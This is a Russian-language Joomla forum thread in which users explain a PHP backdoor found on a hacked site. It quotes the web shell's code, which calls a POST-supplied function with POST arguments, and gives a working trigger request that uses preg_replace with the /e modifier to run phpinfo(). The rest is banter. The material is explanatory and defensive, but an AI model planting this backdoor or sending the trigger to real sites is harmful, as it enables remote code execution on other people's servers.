Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 40 Ответов
  • 2656 Просмотров
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Объясню на пальцах. У вас был получен доступ к файловой системе сервера, произведена запись кода вида
Код: php
error_reporting(0);
$_passssword = '.....................';

$p = $_POST;

if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @.......

Этот код позволяет получить удаленный доступ к вашему сайту и выполнить произвольный код. Сейчас уже не имеют значение права, которые вы выставили, не имеет значение и то, что вы что то где то меняете. Если сами не понимаете, что делать, наймите специалиста. Вас взломали, и искать нужно не только следствие этого взлома, но и его причины. Пройдитесь сканером, как советовали, но опять же, что бы работать со сканером, нужно иметь хотя бы базовые знание PHP.

На пальцах это по другому)))

__________________________
$_passssword = '.....................'; - тут переменная которую ТС спрятал, пусть она условно будет "key"

$p = $_POST; преобразование пост массива в переменную

if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], ''); идет обработка входящих данных, к примеру замени на боли понятный вид:

Код
if (@$_POST['key'] AND @$_POST['a'] AND @$_POST['c'])  @$_POST['key'](@$_POST['a'], @$_POST['c'], '');
где @$_POST['key'](@$_POST['a'], @$_POST['c'], ''); очень начинает напоминать эвристику интересной переменной preg_replace($param1, $param2, $param3);

а теперь если подставить в пост переменные нужные данные а это
POST:key=preg_replace&a=/.*/e&c=phpinfo();

Что нам показывает возможность выполнения любого кода, тетрадки закрываем, урок 1 по бегдорам окончен, все на переменную!

*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
xcalendar.. когда они уже по другому будут называть его. Похоже кто-то распространяет Joomla с уже вставленным бекдором.
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
урок 1 по бегдорам окончен

Берегитесь некоторых минусовальшиков. Я как то просто название бекдора сказал...
*

SeBun

  • BanMaster
  • 4018
  • 259 / 5
  • @SeBun48
На пальцах это по другому)))
Ну я не стал вдаваться в детали, написал в общих чертах. Наглядно и понятно. ТС важнее знать не принцип его работы, а возможности и как с этим бороться.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Берегитесь некоторых минусовальшиков. Я как то просто название бекдора сказал...
мне как то Taatshi мисанул, ему показалось, что я задел его достоинство)))
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
мне как то Taatshi мисанул, ему показалось, что я задел его достоинство)))
Taatshi - она, у неё дочка тебе в невесты просто по возрасту  ^-^ (может что и не так написал) всяко бывает  ;)
..., тетрадки закрываем, урок 1 по бегдорам окончен, все на переменную!
Домашнее задание проверять будешь?
Дневники готовить?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Taatshi - она ... может что и не так написал ...

Ну вот опять не так сказал, еще одного минуса жди ;D

Домашнее задание проверять будешь?
Дневники готовить?
Да, давай, проверю!
*

Dzen

  • Осваиваюсь на форуме
  • 33
  • 0 / 0
:)) тот случай когда видишь что человек отличный специалист, да такой, что боишься дать сайты, потому что ломанёт вообще всё :)))
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
:)) тот случай когда видишь что человек отличный специалист, да такой, что боишься дать сайты, потому что ломанёт вообще всё :)))
Правильно, давайте тем сайты, от которых не боитесь, что ломанут, они вам точно все защитят :))
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Правильно, давайте тем сайты, от которых не боитесь, что ломанут, они вам точно все защитят :))
Не сыпьте в наши огороды камни, а то самим с/х поднимать придется в одиночестве  ^-^
:)) тот случай когда видишь что человек отличный специалист, да такой, что боишься дать сайты, потому что ломанёт вообще всё :)))
На самом деле мягкий плюшевый и пушистый.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
а то самим с/х поднимать придется в одиночестве  ^-^На самом деле мягкий плюшевый и пушистый.
Долго думал... о чем это вы, вроде доперло :laugh:
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Мониторинг файлов CMS и сайта - предлагаю решение

Автор GRIG

Ответов: 18
Просмотров: 4397
Последний ответ 28.08.2020, 22:00:30
от cntrl
Вредоносный код в url после якоря #

Автор dm-krv

Ответов: 7
Просмотров: 1100
Последний ответ 10.07.2018, 14:12:29
от dm-krv
Открытие несуществующих страниц после лечения от вирусов

Автор DimentR

Ответов: 9
Просмотров: 1142
Последний ответ 07.02.2018, 18:04:23
от surho
БД после взлома

Автор cntrl

Ответов: 11
Просмотров: 1011
Последний ответ 09.01.2018, 17:06:17
от Aleks.Denezh
Не выводятся материалы ZOO. После вируса

Автор nuclearacid

Ответов: 1
Просмотров: 898
Последний ответ 29.05.2017, 21:48:36
от robert